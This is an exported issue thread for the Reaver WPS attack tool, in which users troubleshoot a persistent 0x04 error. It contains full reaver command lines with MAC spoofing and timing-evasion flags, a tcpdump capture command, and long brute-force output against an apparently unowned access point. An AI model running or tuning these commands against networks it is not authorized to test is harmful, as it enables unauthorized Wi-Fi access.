amanojha / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

Persistent 0x04 Error #408

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
A few things to consider before submitting an issue:

0. We write documentation for a reason, if you have not read it and are
having problems with Reaver these pages are required reading before
submitting an issue:
http://code.google.com/p/reaver-wps/wiki/HintsAndTips
http://code.google.com/p/reaver-wps/wiki/README
http://code.google.com/p/reaver-wps/wiki/FAQ
http://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers
1. Reaver will only work if your card is in monitor mode.  If you do not
know what monitor mode is then you should learn more about 802.11 hacking
in linux before using Reaver.
2. Using Reaver against access points you do not own or have permission to
attack is illegal.  If you cannot answer basic questions (i.e. model
number, distance away, etc) about the device you are attacking then do not
post your issue here.  We will not help you break the law.
3. Please look through issues that have already been posted and make sure
your question has not already been asked here: http://code.google.com/p
/reaver-wps/issues/list
4. Often times we need packet captures of mon0 while Reaver is running to
troubleshoot the issue (tcpdump -i mon0 -s0 -w broken_reaver.pcap).  Issue
reports with pcap files attached will receive more serious consideration.

Answer the following questions for every issue submitted:

0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.) Reaver 1.4

1. What operating system are you using (Linux is the only supported OS)?
VMWare linux 2.6 (This issue also appeared when running off a BT5 Live USB)

2. Is your wireless card in monitor mode (yes/no)?
yes

3. What is the signal strength of the Access Point you are trying to crack?
-48 dB

4. What is the manufacturer and model # of the device you are trying to
crack?
Unknown (challenged to break an unknown device)

5. What is the entire command line string you are supplying to reaver?
I have tried these, and a couple of variations that are no longer in copy/paste 
range:

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -N -vv -d 5 -x 120 -a -m 00:11:22:33:44:55
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -N -vv -d 3 -x 120 --win7 -m 
00:11:22:33:44:55
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -N -vv -d 3 -a [this was the original 
command]

6. Please describe what you think the issue is.
I have no idea.  I got to ~6% complete, then it got annoyingly persistent 0x04 
error codes.  I've seen a few 0x02, but usually those are immediately after 
attempting a new command variation.  Additionally, I cannot find anywhere what 
the various error codes mean.

Before anyone suggests it:  yes, I am certain I properly spoofed the MAC 
address.  Even followed a tutorial to be certain.  This is happening regardless 
of the MAC, though.

7. Paste the output from Reaver below.
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Restored previous session
[+] Waiting for beacon from 08:86:3B:FA:11:3D
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 6
[+] Associated with 08:86:3B:FA:11:3D (ESSID: belkin.13d)
[+] Trying pin 05815678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 05815678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 05815678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 05815678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 05815678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 05815678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] 5.37% complete @ 2012-09-23 13:16:17 (0 seconds/pin)
[+] Trying pin 05815678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 05815678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 05815678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 05815678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[!] WARNING: 10 failed connections in a row
^C

Note:  This refuses to let me post a .pcap for some reason.  I have one, and 
will mail it on request.

Original issue reported on code.google.com by Hiigaran...@gmail.com on 23 Sep 2012 at 5:28

GoogleCodeExporter commented 8 years ago
try used:
reaver -i mon0 -b <mac> -a -S -N -vv

Original comment by deltomaf...@gmail.com on 10 Oct 2012 at 3:05

GoogleCodeExporter commented 8 years ago
I'm having the exact same issue. Got through an hour of pins and then the exact 
same thing occurred.

[+] Trying pin 05815678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 05815678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin

Just continues to loop.
Line I'm using:

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -c 1 -s -L --lock-delay=315 -S -N -T .5 
-x 360 --win7 --no-nacks -a

I have no idea what '--lock-delay=315' or '-S' '-a' even do. I also feel like 
'-N' and '--no-nacks' being used together is a double.

Original comment by hazelmar...@gmail.com on 23 Nov 2013 at 5:50

GoogleCodeExporter commented 8 years ago
O have the same problem. Im using the same line us you.. I already try all and 
nothing :(

Original comment by Smoket...@gmail.com on 3 Dec 2013 at 6:19